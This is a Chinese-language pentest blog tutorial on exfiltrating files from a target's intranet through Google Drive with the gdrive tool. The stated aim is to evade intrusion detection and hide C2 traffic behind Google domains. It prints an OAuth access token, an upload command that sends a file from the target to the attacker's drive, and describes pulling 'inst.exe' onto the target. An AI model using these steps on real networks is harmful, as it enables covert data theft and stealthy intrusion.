渗透测试-内网大规模文件传输

释放双眼,带上耳机,听听看~!
动图封面

 

0x01 介绍

在定向apt大型目标的时候,目标内网系统会有各种流量入侵检测设备,为了动静小一点,也为了不在传输过大流量数据时暴露自己的c2,我们有必要用到第三方app/网址进行上传/下载,本次主要就 google drive 上传下载为例,进行实操详解。gdirve本身是一个跨平台语言go开发而成的命令行工具,能够兼容linux和win,并且流量域名全部走的是google.com的高可信域名。

 

0x02 实战和传输

0x02.1 测试储备

1. 测试环境:

  • Windows10
  • 杀软:360,360杀毒

2. 依赖条件:

  • 能够上外网
  • 一个google账号以及api (access token….)

先下载gdrive到本地的机器上。所有参数如下:

0x02.2 实战教程

我们先上wiki看下如何使用 gmail 申请access-token

It seems that this app has been blocked so you can’t get an authorization key by going to the URL that is presented when you run it. The following workaround seems to work:

1.进入developers.google.com/o

2.选择Drive API, 点击Authorize APIs。

3.点击 Exchange Authorization Codes for Token。

这样就拿到了Access Token:ya29.A0ARrdaM-vPnyNYOdORKc-j2WgGjgO7OVxXGhW3b80dxa-ukuqsn8lnSssJUWIT7Qu0au-UXrotTNTi4a_kw-O6mItkAplPbwDGxRloVrJA9KM9kx7tPhzTbMpyEryiOk7W4E1HsH7d6GnTCs4AetnHTND5QF1

注意,这里显示了,Access Token只有3597秒的有效期。

有了Access token以后,就可以开始在目标机器上传输文件了

gdrive.exe upload 2.tmp –access-token ya29.A0ARrdaM-vPnyNYOdORKc-j2WgGjgO7OVxXGhW3b80dxa-ukuqsn8lnSssJUWIT7Qu0au-UXrotTNTi4a_kw-O6mItkAplPbwDGxRloVrJA9KM9kx7tPhzTbMpyEryiOk7W4E1HsH7d6GnTCs4AetnHTND5QF1

#使用access-token作为认证,传输同级目录的2.tmp文件到自己的google drive网盘上。

我们抓包查看,走的是googleapis.com的域名,流量也是googleapis.com的流量。

回到我们的google drive上查看,可以看到2.temp已经上传了。

其他常见参数解释。

在目标机器上列出自己google drive上的所有云盘文件。

使用access-token作为认证,下载我们google-drive网盘上id为1X21v-LjM8RY9v_6lLMq16PL8uptqdADj的文件(也就是inst.exe)。

同步目录下所有的文件。

创建test目录。

把本地的1/文件夹里的所有东西,全部同步到云盘上的test目录。

00×03 思考和总结

 

  • 其他的网盘有没有这种第三方的网址的api,能不能传输?

 

  • 我们以后在某一个集团的内网的时候,能否根据内网所使用的服务器提供商自带的一些功能进行传输呢?(比如,在google vps里使用 google drive, 在azure云上的服务器使用onedrive文件传输),这一点就留给读者们继续拓展!

 

参考文献

[1]gdrive https://github.com/prasmussen/gdrive
[2]gdrive_2.1.1_windows_amd64
https://github.com/prasmussen/gdrive/releases/download/2.1.1/gdrive_2.1.1_windows_amd64.tar.gz
[3]wikihttps://github.com/prasmussen/gdrive/wikiapi apply https://developers.google.com/oauthplayground/

给TA买糖
共{{data.count}}人
人已赞赏
行业热点

代码审计工具常见误报及修复

2023-10-28 23:17:58

行业热点

云起无垠典型案例入选《2023软件供应链安全洞察》报告

2023-11-3 11:13:00

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索